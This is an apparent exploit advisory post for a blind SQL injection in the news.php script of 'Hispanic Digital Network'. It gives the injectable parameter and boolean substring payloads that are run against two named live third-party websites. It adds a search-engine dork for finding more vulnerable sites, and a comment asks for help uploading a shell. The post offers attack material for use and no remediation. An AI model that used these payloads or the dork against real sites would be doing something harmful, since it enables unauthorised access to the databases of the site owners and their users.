LFI to RCE via access_log injection

Hispanic Digital Network Blind SQL Injection Vuln

[o] Hispanic Digital Network Blind SQL Injection Vulnerability
Software : Hispanic Digital Network
Vendor : http://www.hdnweb.com/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/

[o] Vulnerable file
news.php

[o] Exploit
http://localhost/[path]/news.php?nid=[Blind SQL]

[o] Proof of Concept
http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=4 = false
http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=5 = true
http://www.thenewsgramonline.net/news.php?nid=493+and+substring(@@version,1,1)=4 = false
http://www.thenewsgramonline.net/news.php?nid=493+and+substring(@@version,1,1)=5 = true

[o] Dork
"powered by Hispanic Digital Network"


[o] Notes
fucking private script again and all target are in one IP address. lol

Comments

GIG said…
plz help upload the shell !